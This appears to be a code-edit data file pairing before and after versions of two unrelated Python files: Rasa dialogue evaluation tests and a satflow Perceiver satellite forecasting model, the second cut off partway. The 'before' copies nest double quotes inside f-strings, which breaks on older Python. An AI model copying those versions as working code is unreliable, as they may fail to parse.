"confidence": 0.87,
"start": 4,
"end": 9,
"value": "1",
},
{
"text": "The first one please.",
"entity": "ordinal",
"start": 4,
"end": 9,
"value": "1",
},
),
(
"Italian food",
{
"extractor": "DIETClassifier",
"entity": "cuisine",
"confidence": 0.99,
"start": 0,
"end": 7,
"value": "Italian",
},
{
"text": "Italian food",
"entity": "cuisine",
"start": 0,
"end": 7,
"value": "Italian",
},
),
],
)
def test_event_has_proper_implementation(
text: Text, entity: Dict[Text, Any], expected_entity: Dict[Text, Any]
):
actual_entities = _clean_entity_results(text, [entity])
assert actual_entities[0] == expected_entity
@pytest.mark.timeout(600)
@pytest.mark.parametrize(
"test_file",
[
("data/test_yaml_stories/test_full_retrieval_intent_story.yml"),
("data/test_yaml_stories/test_base_retrieval_intent_story.yml"),
],
)
async def test_retrieval_intent(response_selector_agent: Agent, test_file: Text):
generator = await _create_data_generator(
test_file, response_selector_agent, use_e2e=True,
)
test_stories = generator.generate_story_trackers()
story_evaluation, num_stories, _ = await _collect_story_predictions(
test_stories, response_selector_agent, use_e2e=True
)
# check that test story can either specify base intent or full retrieval intent
assert not story_evaluation.evaluation_store.has_prediction_target_mismatch()
@pytest.mark.parametrize(
"test_file",
[
("data/test_yaml_stories/test_full_retrieval_intent_wrong_prediction.yml"),
("data/test_yaml_stories/test_base_retrieval_intent_wrong_prediction.yml"),
],
)
async def test_retrieval_intent_wrong_prediction(
tmpdir: Path, response_selector_agent: Agent, test_file: Text
):
stories_path = str(tmpdir / FAILED_STORIES_FILE)
await evaluate_stories(
stories=test_file,
agent=response_selector_agent,
out_directory=str(tmpdir),
max_stories=None,
e2e=True,
)
failed_stories = rasa.shared.utils.io.read_file(stories_path)
# check if the predicted entry contains full retrieval intent
assert "# predicted: chitchat/ask_name" in failed_stories
@pytest.mark.timeout(240)
async def test_e2e_with_entity_evaluation(e2e_bot_agent: Agent, tmp_path: Path):
test_file = "data/test_e2ebot/tests/test_stories.yml"
await evaluate_stories(
stories=test_file,
agent=e2e_bot_agent,
out_directory=str(tmp_path),
max_stories=None,
e2e=True,
)
report = rasa.shared.utils.io.read_json_file(tmp_path / "TEDPolicy_report.json")
assert report["name"] == {
"precision": 1.0,
"recall": 1.0,
"f1-score": 1.0,
"support": 1,
"confused_with": {},
}
assert report["mood"] == {
"precision": 1.0,
"recall": 0.5,
"f1-score": 0.6666666666666666,
"support": 2,
"confused_with": {},
}
errors = rasa.shared.utils.io.read_json_file(tmp_path / "TEDPolicy_errors.json")
assert len(errors) == 1
assert errors[0]["text"] == "today I was very cranky"
@pytest.mark.parametrize(
"stories_yaml,expected_results",
[
[
"""
stories:
- story: story1
steps:
- intent: greet
- action: utter_greet
- story: story2
steps:
- intent: goodbye
- action: utter_goodbye
- story: story3
steps:
- intent: greet
- action: utter_greet
- intent: goodbye
- action: utter_default
""",
{
"utter_goodbye": {
"precision": 1.0,
"recall": 1.0,
"f1-score": 1.0,
"support": 1,
},
"action_listen": {
"precision": 1.0,
"recall": 0.75,
"f1-score": 0.8571428571428571,
"support": 4,
},
"utter_greet": {
"precision": 1.0,
"recall": 1.0,
"f1-score": 1.0,
"support": 2,
},
"utter_default": {
"precision": 0.0,
"recall": 0.0,
"f1-score": 0.0,
"support": 1,
},
"micro avg": {
"precision": 1.0,
"recall": 0.75,
"f1-score": 0.8571428571428571,
"support": 8,
},
"macro avg": {
"precision": 0.75,
"recall": 0.6875,
"f1-score": 0.7142857142857143,
"support": 8,
},
"weighted avg": {
"precision": 0.875,
"recall": 0.75,
"f1-score": 0.8035714285714286,
"support": 8,
},
"conversation_accuracy": {
"accuracy": 2.0 / 3.0,
"total": 3,
"correct": 2,
},
},
],
],
)
async def test_story_report(
tmpdir: Path,
core_agent: Agent,
stories_yaml: Text,
expected_results: Dict[Text, Dict[Text, Any]],
) -> None:
"""Check story_report.json file contains correct result keys/values."""
stories_path = tmpdir / "stories.yml"
stories_path.write_text(stories_yaml, "utf8")
out_directory = tmpdir / "results"
out_directory.mkdir()
await evaluate_stories(stories_path, core_agent, out_directory=out_directory)
story_report_path = out_directory / "story_report.json"
assert story_report_path.exists()
actual_results = json.loads(story_report_path.read_text("utf8"))
assert actual_results == expected_results
async def test_story_report_with_empty_stories(
tmpdir: Path, core_agent: Agent,
) -> None:
stories_path = tmpdir / "stories.yml"
stories_path.write_text("", "utf8")
out_directory = tmpdir / "results"
out_directory.mkdir()
await evaluate_stories(stories_path, core_agent, out_directory=out_directory)
story_report_path = out_directory / "story_report.json"
assert story_report_path.exists()
actual_results = json.loads(story_report_path.read_text("utf8"))
assert actual_results == {}
@pytest.mark.parametrize(
"skip_field,skip_value",
[
[None, None,],
["precision", None,],
["f1", None,],
["in_training_data_fraction", None,],
["report", None,],
["include_report", False,],
],
)
def test_log_evaluation_table(caplog, skip_field, skip_value):
"""Check that _log_evaluation_table correctly omits/includes optional args."""
arr = [1, 1, 1, 0]
acc = 0.75
kwargs = {
"precision": 0.5,
"f1": 0.6,
"in_training_data_fraction": 0.1,
"report": {"macro f1": 0.7},
}
if skip_field:
kwargs[skip_field] = skip_value
caplog.set_level(logging.INFO)
rasa.core.test._log_evaluation_table(arr, "CONVERSATION", acc, **kwargs)
assert f"Correct: {int(len(arr) * acc)} / {len(arr)}" in caplog.text
assert f"Accuracy: {acc:.3f}" in caplog.text
if skip_field != "f1":
assert f"F1-Score: {kwargs["f1"]:5.3f}" in caplog.text
else:
assert "F1-Score:" not in caplog.text
if skip_field != "precision":
assert f"Precision: {kwargs["precision"]:5.3f}" in caplog.text
else:
assert "Precision:" not in caplog.text
if skip_field != "in_training_data_fraction":
assert (
f"In-data fraction: {kwargs["in_training_data_fraction"]:.3g}"
in caplog.text
)
else:
assert "In-data fraction:" not in caplog.text
if skip_field != "report" and skip_field != "include_report":
assert f"Classification report: \n{kwargs["report"]}" in caplog.text
else:
assert "Classification report:" not in caplog.text
| import os
from pathlib import Path
import json
import logging
from typing import Any, Text, Dict
import pytest
import rasa.shared.utils.io
import rasa.utils.io
from rasa.core.test import (
_create_data_generator,
_collect_story_predictions,
test as evaluate_stories,
FAILED_STORIES_FILE,
CONFUSION_MATRIX_STORIES_FILE,
REPORT_STORIES_FILE,
SUCCESSFUL_STORIES_FILE,
_clean_entity_results,
)
from rasa.core.policies.memoization import MemoizationPolicy
# we need this import to ignore the warning...
# noinspection PyUnresolvedReferences
from rasa.nlu.test import evaluate_entities, run_evaluation
from rasa.core.agent import Agent
from tests.core.conftest import (
DEFAULT_STORIES_FILE,
E2E_STORY_FILE_UNKNOWN_ENTITY,
END_TO_END_STORY_FILE,
E2E_STORY_FILE_TRIPS_CIRCUIT_BREAKER,
STORY_FILE_TRIPS_CIRCUIT_BREAKER,
)
async def test_evaluation_file_creation(tmpdir: Path, default_agent: Agent):
failed_stories_path = str(tmpdir / FAILED_STORIES_FILE)
success_stories_path = str(tmpdir / SUCCESSFUL_STORIES_FILE)
report_path = str(tmpdir / REPORT_STORIES_FILE)
confusion_matrix_path = str(tmpdir / CONFUSION_MATRIX_STORIES_FILE)
await evaluate_stories(
stories=DEFAULT_STORIES_FILE,
agent=default_agent,
out_directory=str(tmpdir),
max_stories=None,
e2e=False,
errors=True,
successes=True,
)
assert os.path.isfile(failed_stories_path)
assert os.path.isfile(success_stories_path)
assert os.path.isfile(report_path)
assert os.path.isfile(confusion_matrix_path)
async def test_end_to_end_evaluation_script(default_agent: Agent):
generator = await _create_data_generator(
END_TO_END_STORY_FILE, default_agent, use_e2e=True
)
completed_trackers = generator.generate_story_trackers()
story_evaluation, num_stories, _ = await _collect_story_predictions(
completed_trackers, default_agent, use_e2e=True
)
serialised_store = [
"utter_greet",
"action_listen",
"utter_greet",
"action_listen",
"utter_default",
"action_listen",
"utter_goodbye",
"action_listen",
"utter_greet",
"action_listen",
"utter_default",
"action_listen",
"greet",
"greet",
"default",
"goodbye",
"greet",
"default",
'[{"name": "Max"}]{"entity": "name", "value": "Max"}',
]
assert story_evaluation.evaluation_store.serialise()[0] == serialised_store
assert not story_evaluation.evaluation_store.has_prediction_target_mismatch()
assert len(story_evaluation.failed_stories) == 0
assert num_stories == 3
async def test_end_to_end_evaluation_script_unknown_entity(default_agent: Agent):
generator = await _create_data_generator(
E2E_STORY_FILE_UNKNOWN_ENTITY, default_agent, use_e2e=True
)
completed_trackers = generator.generate_story_trackers()
story_evaluation, num_stories, _ = await _collect_story_predictions(
completed_trackers, default_agent, use_e2e=True
)
assert story_evaluation.evaluation_store.has_prediction_target_mismatch()
assert len(story_evaluation.failed_stories) == 1
assert num_stories == 1
@pytest.mark.timeout(300)
async def test_end_to_evaluation_with_forms(form_bot_agent: Agent):
generator = await _create_data_generator(
"data/test_evaluations/form_end_to_end_stories.yml",
form_bot_agent,
use_e2e=True,
)
test_stories = generator.generate_story_trackers()
story_evaluation, num_stories, _ = await _collect_story_predictions(
test_stories, form_bot_agent, use_e2e=True
)
assert not story_evaluation.evaluation_store.has_prediction_target_mismatch()
async def test_source_in_failed_stories(tmpdir: Path, default_agent: Agent):
stories_path = str(tmpdir / FAILED_STORIES_FILE)
await evaluate_stories(
stories=E2E_STORY_FILE_UNKNOWN_ENTITY,
agent=default_agent,
out_directory=str(tmpdir),
max_stories=None,
e2e=False,
)
story_file_unknown_entity = Path(E2E_STORY_FILE_UNKNOWN_ENTITY).absolute()
failed_stories = rasa.shared.utils.io.read_file(stories_path)
assert (
f"story: simple_story_with_unknown_entity ({story_file_unknown_entity})"
in failed_stories
)
async def test_end_to_evaluation_trips_circuit_breaker():
agent = Agent(
domain="data/test_domains/default.yml",
policies=[MemoizationPolicy(max_history=11)],
)
training_data = await agent.load_data(STORY_FILE_TRIPS_CIRCUIT_BREAKER)
agent.train(training_data)
generator = await _create_data_generator(
E2E_STORY_FILE_TRIPS_CIRCUIT_BREAKER, agent, use_e2e=True
)
test_stories = generator.generate_story_trackers()
story_evaluation, num_stories, _ = await _collect_story_predictions(
test_stories, agent, use_e2e=True
)
circuit_trip_predicted = [
"utter_greet",
"utter_greet",
"utter_greet",
"utter_greet",
"utter_greet",
"utter_greet",
"utter_greet",
"utter_greet",
"utter_greet",
"utter_greet",
"circuit breaker tripped",
"circuit breaker tripped",
]
assert (
story_evaluation.evaluation_store.action_predictions == circuit_trip_predicted
)
assert num_stories == 1
@pytest.mark.parametrize(
"text, entity, expected_entity",
[
(
"The first one please.",
{
"extractor": "DucklingEntityExtractor",
"entity": "ordinal",
"confidence": 0.87,
"start": 4,
"end": 9,
"value": 1,
},
{
"text": "The first one please.",
"entity": "ordinal",
"start": 4,
"end": 9,
"value": "1",
},
),
(
"The first one please.",
{
"extractor": "CRFEntityExtractor",
"entity": "ordinal",
"confidence": 0.87,
"start": 4,
"end": 9,
"value": "1",
},
{
"text": "The first one please.",
"entity": "ordinal",
"start": 4,
"end": 9,
"value": "1",
},
),
(
"Italian food",
{
"extractor": "DIETClassifier",
"entity": "cuisine",
"confidence": 0.99,
"start": 0,
"end": 7,
"value": "Italian",
},
{
"text": "Italian food",
"entity": "cuisine",
"start": 0,
"end": 7,
"value": "Italian",
},
),
],
)
def test_event_has_proper_implementation(
text: Text, entity: Dict[Text, Any], expected_entity: Dict[Text, Any]
):
actual_entities = _clean_entity_results(text, [entity])
assert actual_entities[0] == expected_entity
@pytest.mark.timeout(600)
@pytest.mark.parametrize(
"test_file",
[
("data/test_yaml_stories/test_full_retrieval_intent_story.yml"),
("data/test_yaml_stories/test_base_retrieval_intent_story.yml"),
],
)
async def test_retrieval_intent(response_selector_agent: Agent, test_file: Text):
generator = await _create_data_generator(
test_file, response_selector_agent, use_e2e=True,
)
test_stories = generator.generate_story_trackers()
story_evaluation, num_stories, _ = await _collect_story_predictions(
test_stories, response_selector_agent, use_e2e=True
)
# check that test story can either specify base intent or full retrieval intent
assert not story_evaluation.evaluation_store.has_prediction_target_mismatch()
@pytest.mark.parametrize(
"test_file",
[
("data/test_yaml_stories/test_full_retrieval_intent_wrong_prediction.yml"),
("data/test_yaml_stories/test_base_retrieval_intent_wrong_prediction.yml"),
],
)
async def test_retrieval_intent_wrong_prediction(
tmpdir: Path, response_selector_agent: Agent, test_file: Text
):
stories_path = str(tmpdir / FAILED_STORIES_FILE)
await evaluate_stories(
stories=test_file,
agent=response_selector_agent,
out_directory=str(tmpdir),
max_stories=None,
e2e=True,
)
failed_stories = rasa.shared.utils.io.read_file(stories_path)
# check if the predicted entry contains full retrieval intent
assert "# predicted: chitchat/ask_name" in failed_stories
@pytest.mark.timeout(240)
async def test_e2e_with_entity_evaluation(e2e_bot_agent: Agent, tmp_path: Path):
test_file = "data/test_e2ebot/tests/test_stories.yml"
await evaluate_stories(
stories=test_file,
agent=e2e_bot_agent,
out_directory=str(tmp_path),
max_stories=None,
e2e=True,
)
report = rasa.shared.utils.io.read_json_file(tmp_path / "TEDPolicy_report.json")
assert report["name"] == {
"precision": 1.0,
"recall": 1.0,
"f1-score": 1.0,
"support": 1,
"confused_with": {},
}
assert report["mood"] == {
"precision": 1.0,
"recall": 0.5,
"f1-score": 0.6666666666666666,
"support": 2,
"confused_with": {},
}
errors = rasa.shared.utils.io.read_json_file(tmp_path / "TEDPolicy_errors.json")
assert len(errors) == 1
assert errors[0]["text"] == "today I was very cranky"
@pytest.mark.parametrize(
"stories_yaml,expected_results",
[
[
"""
stories:
- story: story1
steps:
- intent: greet
- action: utter_greet
- story: story2
steps:
- intent: goodbye
- action: utter_goodbye
- story: story3
steps:
- intent: greet
- action: utter_greet
- intent: goodbye
- action: utter_default
""",
{
"utter_goodbye": {
"precision": 1.0,
"recall": 1.0,
"f1-score": 1.0,
"support": 1,
},
"action_listen": {
"precision": 1.0,
"recall": 0.75,
"f1-score": 0.8571428571428571,
"support": 4,
},
"utter_greet": {
"precision": 1.0,
"recall": 1.0,
"f1-score": 1.0,
"support": 2,
},
"utter_default": {
"precision": 0.0,
"recall": 0.0,
"f1-score": 0.0,
"support": 1,
},
"micro avg": {
"precision": 1.0,
"recall": 0.75,
"f1-score": 0.8571428571428571,
"support": 8,
},
"macro avg": {
"precision": 0.75,
"recall": 0.6875,
"f1-score": 0.7142857142857143,
"support": 8,
},
"weighted avg": {
"precision": 0.875,
"recall": 0.75,
"f1-score": 0.8035714285714286,
"support": 8,
},
"conversation_accuracy": {
"accuracy": 2.0 / 3.0,
"total": 3,
"correct": 2,
},
},
],
],
)
async def test_story_report(
tmpdir: Path,
core_agent: Agent,
stories_yaml: Text,
expected_results: Dict[Text, Dict[Text, Any]],
) -> None:
"""Check story_report.json file contains correct result keys/values."""
stories_path = tmpdir / "stories.yml"
stories_path.write_text(stories_yaml, "utf8")
out_directory = tmpdir / "results"
out_directory.mkdir()
await evaluate_stories(stories_path, core_agent, out_directory=out_directory)
story_report_path = out_directory / "story_report.json"
assert story_report_path.exists()
actual_results = json.loads(story_report_path.read_text("utf8"))
assert actual_results == expected_results
async def test_story_report_with_empty_stories(
tmpdir: Path, core_agent: Agent,
) -> None:
stories_path = tmpdir / "stories.yml"
stories_path.write_text("", "utf8")
out_directory = tmpdir / "results"
out_directory.mkdir()
await evaluate_stories(stories_path, core_agent, out_directory=out_directory)
story_report_path = out_directory / "story_report.json"
assert story_report_path.exists()
actual_results = json.loads(story_report_path.read_text("utf8"))
assert actual_results == {}
@pytest.mark.parametrize(
"skip_field,skip_value",
[
[None, None,],
["precision", None,],
["f1", None,],
["in_training_data_fraction", None,],
["report", None,],
["include_report", False,],
],
)
def test_log_evaluation_table(caplog, skip_field, skip_value):
"""Check that _log_evaluation_table correctly omits/includes optional args."""
arr = [1, 1, 1, 0]
acc = 0.75
kwargs = {
"precision": 0.5,
"f1": 0.6,
"in_training_data_fraction": 0.1,
"report": {"macro f1": 0.7},
}
if skip_field:
kwargs[skip_field] = skip_value
caplog.set_level(logging.INFO)
rasa.core.test._log_evaluation_table(arr, "CONVERSATION", acc, **kwargs)
assert f"Correct: {int(len(arr) * acc)} / {len(arr)}" in caplog.text
assert f"Accuracy: {acc:.3f}" in caplog.text
if skip_field != "f1":
assert f"F1-Score: {kwargs['f1']:5.3f}" in caplog.text
else:
assert "F1-Score:" not in caplog.text
if skip_field != "precision":
assert f"Precision: {kwargs['precision']:5.3f}" in caplog.text
else:
assert "Precision:" not in caplog.text
if skip_field != "in_training_data_fraction":
assert (
f"In-data fraction: {kwargs['in_training_data_fraction']:.3g}"
in caplog.text
)
else:
assert "In-data fraction:" not in caplog.text
if skip_field != "report" and skip_field != "include_report":
assert f"Classification report: \n{kwargs['report']}" in caplog.text
else:
assert "Classification report:" not in caplog.text
|
from perceiver_pytorch import PerceiverIO, MultiPerceiver
from perceiver_pytorch.modalities import InputModality, modality_encoding
from perceiver_pytorch.utils import encode_position
from perceiver_pytorch.encoders import ImageEncoder
from perceiver_pytorch.decoders import ImageDecoder
import torch
from math import prod
from torch.distributions import uniform
from typing import Iterable, Dict, Optional, Any, Union, Tuple
from satflow.models.base import register_model, BaseModel
from einops import rearrange, repeat
from pl_bolts.optimizers.lr_scheduler import LinearWarmupCosineAnnealingLR
from satflow.models.losses import get_loss
import torch_optimizer as optim
import logging
logger = logging.getLogger("satflow.model")
logger.setLevel(logging.WARN)
@register_model
class Perceiver(BaseModel):
def __init__(
self,
input_channels: int = 12,
sat_channels: int = 12,
forecast_steps: int = 48,
input_size: int = 64,
lr: float = 5e-4,
visualize: bool = True,
max_frequency: float = 4.0,
depth: int = 6,
num_latents: int = 256,
cross_heads: int = 1,
latent_heads: int = 8,
cross_dim_heads: int = 8,
latent_dim: int = 512,
weight_tie_layers: bool = False,
decoder_ff: bool = True,
dim: int = 32,
logits_dim: int = 100,
queries_dim: int = 32,
latent_dim_heads: int = 64,
loss="mse",
sin_only: bool = False,
encode_fourier: bool = True,
preprocessor_type: Optional[str] = None,
postprocessor_type: Optional[str] = None,
encoder_kwargs: Optional[Dict[str, Any]] = None,
decoder_kwargs: Optional[Dict[str, Any]] = None,
pretrained: bool = False,
):
super(BaseModel, self).__init__()
self.forecast_steps = forecast_steps
self.input_channels = input_channels
self.lr = lr
self.pretrained = pretrained
self.visualize = visualize
self.sat_channels = sat_channels
self.output_channels = sat_channels
self.criterion = get_loss(loss)
# Warn if using frequency is smaller than Nyquist Frequency
if max_frequency < input_size / 2:
print(
f"Max frequency is less than Nyquist frequency, currently set to {max_frequency} while "
f"the Nyquist frequency for input of size {input_size} is {input_size / 2}"
)
# Preprocessor, if desired, on top of the other processing done
if preprocessor_type is not None:
if preprocessor_type not in ("conv", "patches", "pixels", "conv1x1", "metnet"):
raise ValueError("Invalid prep_type!")
if preprocessor_type == "metnet":
# MetNet processing
self.preprocessor = ImageEncoder(
crop_size=input_size,
preprocessor_type="metnet",
)
video_input_channels = (
8 * sat_channels
) # This is only done on the sat channel inputs
# If doing it on the base map, then need
image_input_channels = 4 * (input_channels - sat_channels)
else:
self.preprocessor = ImageEncoder(
input_channels=sat_channels,
preprocessor_type=preprocessor_type,
**encoder_kwargs,
)
video_input_channels = self.preprocessor.output_channels
image_input_channels = self.preprocessor.output_channels
else:
self.preprocessor = None
video_input_channels = sat_channels
image_input_channels = input_channels - sat_channels
# The preprocessor will change the number of channels in the input
# Timeseries input
video_modality = InputModality(
name="timeseries",
input_channels=video_input_channels,
input_axis=3, # number of axes, 3 for video
num_freq_bands=input_size, # number of freq bands, with original value (2 * K + 1)
max_freq=max_frequency, # maximum frequency, hyperparameter depending on how fine the data is, should be Nyquist frequency (i.e. 112 for 224 input image)
sin_only=sin_only, # Whether if sine only for Fourier encoding, TODO test more
fourier_encode=encode_fourier, # Whether to encode position with Fourier features
)
# Use image modality for latlon, elevation, other base data?
image_modality = InputModality(
name="base",
input_channels=image_input_channels,
input_axis=2, # number of axes, 2 for images
num_freq_bands=input_size, # number of freq bands, with original value (2 * K + 1)
max_freq=max_frequency, # maximum frequency, hyperparameter depending on how fine the data is
sin_only=sin_only,
fourier_encode=encode_fourier,
)
# Sort audio for timestep one-hot encode? Or include under other modality?
timestep_modality = InputModality(
name="forecast_time",
input_channels=1, # number of channels for mono audio
input_axis=1, # number of axes, 2 for images
num_freq_bands=self.forecast_steps, # number of freq bands, with original value (2 * K + 1)
max_freq=max_frequency, # maximum frequency, hyperparameter depending on how fine the data is
sin_only=sin_only,
fourier_encode=encode_fourier,
)
self.model = MultiPerceiver(
modalities=[video_modality, image_modality, timestep_modality],
dim=dim, # dimension of sequence to be encoded
queries_dim=queries_dim, # dimension of decoder queries
logits_dim=logits_dim, # dimension of final logits
depth=depth, # depth of net
num_latents=num_latents, # number of latents, or induced set points, or centroids. different papers giving it different names
latent_dim=latent_dim, # latent dimension
cross_heads=cross_heads, # number of heads for cross attention. paper said 1
latent_heads=latent_heads, # number of heads for latent self attention, 8
cross_dim_head=cross_dim_heads, # number of dimensions per cross attention head
latent_dim_head=latent_dim_heads, # number of dimensions per latent self attention head
weight_tie_layers=weight_tie_layers, # whether to weight tie layers (optional, as indicated in the diagram)
# self_per_cross_attn=self_per_cross_attention, # number of self attention blocks per cross attention
sine_only=sin_only,
fourier_encode_data=encode_fourier,
output_shape=input_size, # Shape of output to make the correct sized logits dim, needed so reshaping works
decoder_ff=decoder_ff, # Optional decoder FF
)
if postprocessor_type is not None:
if postprocessor_type not in ("conv", "patches", "pixels", "conv1x1"):
raise ValueError("Invalid postprocessor_type!")
self.postprocessor = ImageDecoder(
postprocess_type=postprocessor_type, output_channels=sat_channels, **decoder_kwargs
)
else:
self.postprocessor = None
def encode_inputs(self, x: torch.Tensor) -> Dict[str, torch.Tensor]:
video_inputs = x[:, :, : self.sat_channels, :, :]
base_inputs = x[
:, 0, self.sat_channels :, :, :
] # Base maps should be the same for all timesteps in a sample
# Run the preprocessors here when encoding the inputs
if self.preprocessor is not None:
# Expects Channel first
video_inputs = self.preprocessor(video_inputs)
base_inputs = self.preprocessor(base_inputs)
video_inputs = video_inputs.permute(0, 1, 3, 4, 2) # Channel last
base_inputs = base_inputs.permute(0, 2, 3, 1) # Channel last
logger.debug(f"Timeseries: {video_inputs.size()} Base: {base_inputs.size()}")
return {"timeseries": video_inputs, "base": base_inputs}
def add_timestep(self, batch_size: int, timestep: int = 1) -> torch.Tensor:
times = (torch.eye(self.forecast_steps)[timestep]).unsqueeze(-1).unsqueeze(-1)
ones = torch.ones(1, 1, 1)
timestep_input = times * ones
timestep_input = timestep_input.squeeze(-1)
timestep_input = repeat(timestep_input, "... -> b ...", b=batch_size)
logger.debug(f"Forecast Step: {timestep_input.size()}")
return timestep_input
def _train_or_validate_step(self, batch, batch_idx, is_training: bool = True):
x, y = batch
batch_size = y.size(0)
# For each future timestep:
predictions = []
query = self.construct_query(x)
if self.visualize:
vis_x = x.cpu()
x = self.encode_inputs(x)
for i in range(self.forecast_steps):
x["forecast_time"] = self.add_timestep(batch_size, i).type_as(y)
# x_i = self.ct(x["timeseries"], fstep=i)
y_hat = self(x, query=query)
y_hat = rearrange(y_hat, "b h (w c) -> b c h w", c=self.output_channels)
predictions.append(y_hat)
y_hat = torch.stack(predictions, dim=1) # Stack along the timestep dimension
if self.postprocessor is not None:
y_hat = self.postprocessor(y_hat)
if self.visualize:
# Only visualize the second batch of train/val
if batch_idx == 1:
self.visualize_step(
vis_x, y, y_hat, batch_idx, step=f"{"train" if is_training else "val"}"
)
loss = self.criterion(y, y_hat)
self.log_dict({f"{"train" if is_training else "val"}/loss": loss})
frame_loss_dict = {}
for f in range(self.forecast_steps):
frame_loss = self.criterion(y_hat[:, f, :, :, :], y[:, f, :, :, :]).item()
frame_loss_dict[f"{"train" if is_training else "val"}/frame_{f}_loss"] = frame_loss
self.log_dict(frame_loss_dict)
return loss
def configure_optimizers(self):
# They use LAMB as the optimizer
optimizer = optim.Lamb(self.parameters(), lr=self.lr, betas=(0.9, 0.999))
scheduler = LinearWarmupCosineAnnealingLR(optimizer, warmup_epochs=10, max_epochs=100)
lr_dict = {
# REQUIRED: The scheduler instance
"scheduler": scheduler,
# The unit of the scheduler's step size, could also be 'step'.
# 'epoch' updates the scheduler on epoch end whereas 'step'
# updates it after a optimizer update.
"interval": "step",
# How many epochs/steps should pass between calls to
# `scheduler.step()`. 1 corresponds to updating the learning
# rate after every epoch/step.
"frequency": 1,
# If using the `LearningRateMonitor` callback to monitor the
# learning rate progress, this keyword can be used to specify
# a custom logged name
"name": None,
}
return {"optimizer": optimizer, "lr_scheduler": lr_dict}
def construct_query(self, x):
# key, value: B x N x K; query: B x M x K
# Attention maps -> B x N x M
# Output -> B x M x K
# So want query to be B X (T*H*W) X C to reshape to B x T x C x H x W
if self.preprocessor is not None:
x = self.preprocessor(x)
y_query = x[:, -1, 0, :, :] # Only want sat channels, the output
# y_query = torch.permute(y_query, (0, 2, 3, 1)) # Channel Last
# Need to reshape to 3 dimensions, TxHxW or HxWxC
# y_query = rearrange(y_query, "b h w d -> b (h w) d")
logger.debug(f"Query Shape: {y_query.shape}")
return y_query
def forward(self, x, mask=None, query=None):
return self.model.forward(x, mask=mask, queries=query)
class MultiPerceiverSat(torch.nn.Module):
def __init__(
self,
use_input_as_query: bool = False,
use_learnable_query: bool = False,
**kwargs,
):
"""
PerceiverIO made to work more specifically with timeseries images
Not a recurrent model, so like MetNet somewhat, can optionally give a one-hot encoded vector for the future
timestep
Args:
input_channels: Number of input channels
forecast_steps: Number of forecast steps to make
**kwargs:
"""
super(MultiPerceiverSat, self).__init__()
self.multi_perceiver = MultiPerceiver(**kwargs)
if use_learnable_query:
self.learnable_query = torch.nn.Linear(self.query_dim, self.query_dim)
self.distribution = uniform.Uniform(low=torch.Tensor([0.0]), high=torch.Tensor([1.0]))
self.query_dim = kwargs.get("query_dim", 32)
self.query_future_size = prod(kwargs.get("output_shape", [24, 32, 32]))
# Like GAN sorta, random input, learn important parts in linear layer T*H*W shape,
# need to add Fourier features too though
def forward(self, multi_modality_data: Dict[str, torch.Tensor], mask=None, queries=None):
data = self.multi_perceiver.forward(multi_modality_data)
# Create learnable query here, need to add fourier features as well
if self.use_learnable_query:
# Create learnable query, also adds somewhat ensemble on multiple forward passes
# Middle is the shape of the future timesteps and such
z = self.distribution.sample(
(data.shape[0], self.query_future_size, self.query_dim)
).type_as(data)
queries = self.learnable_query(z)
# Add Fourier Features now to the query
perceiver_output = self.multi_perceiver.perceiver.forward(data, mask, queries)
logger.debug(f"Perceiver Finished Output: {perceiver_output.size()}")
return perceiver_output
| from perceiver_pytorch import PerceiverIO, MultiPerceiver
from perceiver_pytorch.modalities import InputModality, modality_encoding
from perceiver_pytorch.utils import encode_position
from perceiver_pytorch.encoders import ImageEncoder
from perceiver_pytorch.decoders import ImageDecoder
import torch
from math import prod
from torch.distributions import uniform
from typing import Iterable, Dict, Optional, Any, Union, Tuple
from satflow.models.base import register_model, BaseModel
from einops import rearrange, repeat
from pl_bolts.optimizers.lr_scheduler import LinearWarmupCosineAnnealingLR
from satflow.models.losses import get_loss
import torch_optimizer as optim
import logging
logger = logging.getLogger("satflow.model")
logger.setLevel(logging.WARN)
@register_model
class Perceiver(BaseModel):
def __init__(
self,
input_channels: int = 12,
sat_channels: int = 12,
forecast_steps: int = 48,
input_size: int = 64,
lr: float = 5e-4,
visualize: bool = True,
max_frequency: float = 4.0,
depth: int = 6,
num_latents: int = 256,
cross_heads: int = 1,
latent_heads: int = 8,
cross_dim_heads: int = 8,
latent_dim: int = 512,
weight_tie_layers: bool = False,
decoder_ff: bool = True,
dim: int = 32,
logits_dim: int = 100,
queries_dim: int = 32,
latent_dim_heads: int = 64,
loss="mse",
sin_only: bool = False,
encode_fourier: bool = True,
preprocessor_type: Optional[str] = None,
postprocessor_type: Optional[str] = None,
encoder_kwargs: Optional[Dict[str, Any]] = None,
decoder_kwargs: Optional[Dict[str, Any]] = None,
pretrained: bool = False,
):
super(BaseModel, self).__init__()
self.forecast_steps = forecast_steps
self.input_channels = input_channels
self.lr = lr
self.pretrained = pretrained
self.visualize = visualize
self.sat_channels = sat_channels
self.output_channels = sat_channels
self.criterion = get_loss(loss)
# Warn if using frequency is smaller than Nyquist Frequency
if max_frequency < input_size / 2:
print(
f"Max frequency is less than Nyquist frequency, currently set to {max_frequency} while "
f"the Nyquist frequency for input of size {input_size} is {input_size / 2}"
)
# Preprocessor, if desired, on top of the other processing done
if preprocessor_type is not None:
if preprocessor_type not in ("conv", "patches", "pixels", "conv1x1", "metnet"):
raise ValueError("Invalid prep_type!")
if preprocessor_type == "metnet":
# MetNet processing
self.preprocessor = ImageEncoder(
crop_size=input_size,
preprocessor_type="metnet",
)
video_input_channels = (
8 * sat_channels
) # This is only done on the sat channel inputs
# If doing it on the base map, then need
image_input_channels = 4 * (input_channels - sat_channels)
else:
self.preprocessor = ImageEncoder(
input_channels=sat_channels,
preprocessor_type=preprocessor_type,
**encoder_kwargs,
)
video_input_channels = self.preprocessor.output_channels
image_input_channels = self.preprocessor.output_channels
else:
self.preprocessor = None
video_input_channels = sat_channels
image_input_channels = input_channels - sat_channels
# The preprocessor will change the number of channels in the input
# Timeseries input
video_modality = InputModality(
name="timeseries",
input_channels=video_input_channels,
input_axis=3, # number of axes, 3 for video
num_freq_bands=input_size, # number of freq bands, with original value (2 * K + 1)
max_freq=max_frequency, # maximum frequency, hyperparameter depending on how fine the data is, should be Nyquist frequency (i.e. 112 for 224 input image)
sin_only=sin_only, # Whether if sine only for Fourier encoding, TODO test more
fourier_encode=encode_fourier, # Whether to encode position with Fourier features
)
# Use image modality for latlon, elevation, other base data?
image_modality = InputModality(
name="base",
input_channels=image_input_channels,
input_axis=2, # number of axes, 2 for images
num_freq_bands=input_size, # number of freq bands, with original value (2 * K + 1)
max_freq=max_frequency, # maximum frequency, hyperparameter depending on how fine the data is
sin_only=sin_only,
fourier_encode=encode_fourier,
)
